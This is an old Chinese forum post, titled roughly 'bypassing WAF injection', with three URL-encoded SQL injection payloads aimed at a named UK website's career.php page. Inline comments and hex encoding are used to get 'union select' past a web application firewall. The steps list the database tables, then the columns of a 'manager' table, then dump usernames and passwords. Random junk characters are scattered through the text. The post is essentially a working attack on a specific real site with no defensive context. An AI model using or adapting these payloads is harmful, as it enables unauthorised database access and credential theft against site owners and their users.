标题: 绕过waf注入 [打印本页] 作者: admin 时间: 2013-3-8 21:51 标题: 绕过waf注入 waf过滤了 union select from 等关键词 ( ^) Z/ {: j, u4 k 3 a& e1 f( _6 q 1 E. N3 W: J2 w1.列当前库所有表 8 w4 F# c; \6 C/ ^: Ghttp://jyht.co.uk/career.php2 Z' ]7 n; A [) f" v7 J& o. h6 S$ n
?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,%28%53%45%4C%45%43%54%20%47%52%4F%55%50%5F%43%4F%4E%43%41%54%28%69%2E%54%41%42%4C%45%5F%4E%41%4D%45%2C%30%78%33%43%36%32%37%32%32%46%33%45%29%20%46%52%4F%4D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%54%41%42%4C%45%53%20%41%53%20%69%20%57%48%45%52%45%20%69%2E%54%41%42%4C%45%5F%53%43%48%45%4D%41%20%3D%20%64%61%74%61%62%61%73%65%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18# c: N9 I6 F8 P# Q
) ?) d6 ~; K9 g, u- g/ V. l+ U" c2.获取字段( i: i: G. R2 d; n$ R# w* x' ~ http://jyht.co.uk/career.php $ g l- `7 K% R" V5 l2 s?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,4,group_concat(COLUMN_NAME,0x3C2F62723E),6,7,8,9,10,11,12,13,14,15,16,17,18/**/%66%72%6F%6D%20%69%6E%66%6F%72%6D%61%74%69%6F%6E%5F%73%63%68%65%6D%61%2E%43%4F%4C%55%4D%4E%53%20%77%68%65%72%65%20%54%41%42%4C%45%5F%4E%41%4D%45%3D%30%78%36%44%36%31%36%45%36%31%36%37%36%35%37%32+ l- F$ f2 Z. G+ R* c
`& v3 M- y/ }. N* g3.直接获取数据 0 S3 K4 c. u2 Z0 n2 v7 ahttp://jyht.co.uk/career.php( r5 U. }9 U3 Z5 z9 V
?id=11/**/and/**/1=2/**/%75%6E%69%6F%6E/**/SELECT/**/1,2,3,group_concat(id,0x3d,username,0x3d,password,0x3C62722F3E),5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/%66%72%6F%6D/**/%6D%61%6E%61%67%65%72, W k+ \5 _9 b) j. t